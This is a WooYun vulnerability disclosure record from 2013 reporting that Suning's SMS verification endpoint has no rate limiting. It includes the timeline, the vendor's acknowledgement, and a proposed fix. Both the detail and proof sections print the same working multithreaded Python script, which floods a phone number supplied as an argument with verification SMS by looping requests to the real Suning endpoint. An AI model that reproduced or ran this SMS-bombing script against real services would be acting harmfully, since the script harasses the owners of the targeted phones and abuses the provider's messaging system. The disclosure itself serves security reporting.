当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040837

漏洞标题:苏宁易购短信验证码短信轰炸

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: saar

提交时间:2013-10-24 16:34

修复时间:2013-12-08 16:34

公开时间:2013-12-08 16:34

漏洞类型:网络设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-24: 细节已通知厂商并且等待厂商处理中
2013-10-24: 厂商已经确认,细节仅向厂商公开
2013-11-03: 细节向核心白帽子及相关领域专家公开
2013-11-13: 细节向普通白帽子公开
2013-11-23: 细节向实习白帽子公开
2013-12-08: 细节向公众公开

简要描述:

通过不断发包发送短信。没设置间隔时间。

详细说明:

利用代码

#! /usr/bin/env python
#coding=utf8
from  time import ctime,sleep
import urllib2
import cookielib
import urllib
import sys
import thread
import threading;
class ThreadMessage(threading.Thread):
  def __init__(self,func,args,name):
    super(ThreadMessage,self).__init__();
    self.func = func
    self.args = args
    self.name = name
  def run(self):
    self.result = self.func(*self.args);
def sendMessage(n,number):
  cookie = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
  print "Thread begin:",n
  i=0
  while i<=number:
    response = opener.open('https://member.suning.com/emall/SendMobileCodeCmd')
    data={'mobile':sys.argv[1],'scenario':'mobileRegister'}
    r=opener.open('https://member.suning.com/emall/SendMobileCodeCmd',urllib.urlencode(data))
    i+=1
    print "send:",i
def main():
  threads=[]
  for i in range(1,10):
    t = ThreadMessage(sendMessage,(i,100),sendMessage.__name__)
    threads.append(t)
  print "main Thread begins at",ctime()
  for t in threads:
    t.start();
  for t in threads:
    t.join();
  print "main thread ends at",ctime();
if __name__=='__main__':
  main();


QQ截图20131024013407.png


漏洞证明:

利用代码

#! /usr/bin/env python
#coding=utf8
from  time import ctime,sleep
import urllib2
import cookielib
import urllib
import sys
import thread
import threading;
class ThreadMessage(threading.Thread):
  def __init__(self,func,args,name):
    super(ThreadMessage,self).__init__();
    self.func = func
    self.args = args
    self.name = name
  def run(self):
    self.result = self.func(*self.args);
def sendMessage(n,number):
  cookie = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
  print "Thread begin:",n
  i=0
  while i<=number:
    response = opener.open('https://member.suning.com/emall/SendMobileCodeCmd')
    data={'mobile':sys.argv[1],'scenario':'mobileRegister'}
    r=opener.open('https://member.suning.com/emall/SendMobileCodeCmd',urllib.urlencode(data))
    i+=1
    print "send:",i
def main():
  threads=[]
  for i in range(1,10):
    t = ThreadMessage(sendMessage,(i,100),sendMessage.__name__)
    threads.append(t)
  print "main Thread begins at",ctime()
  for t in threads:
    t.start();
  for t in threads:
    t.join();
  print "main thread ends at",ctime();
if __name__=='__main__':
  main();


QQ截图20131024013407.png

修复方案:

增加时间验证。

版权声明:转载请注明来源 saar@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-24 18:13

厂商回复:

感谢您对苏宁易购的关注,正在安排人员对此漏洞进行修复。

最新状态:

暂无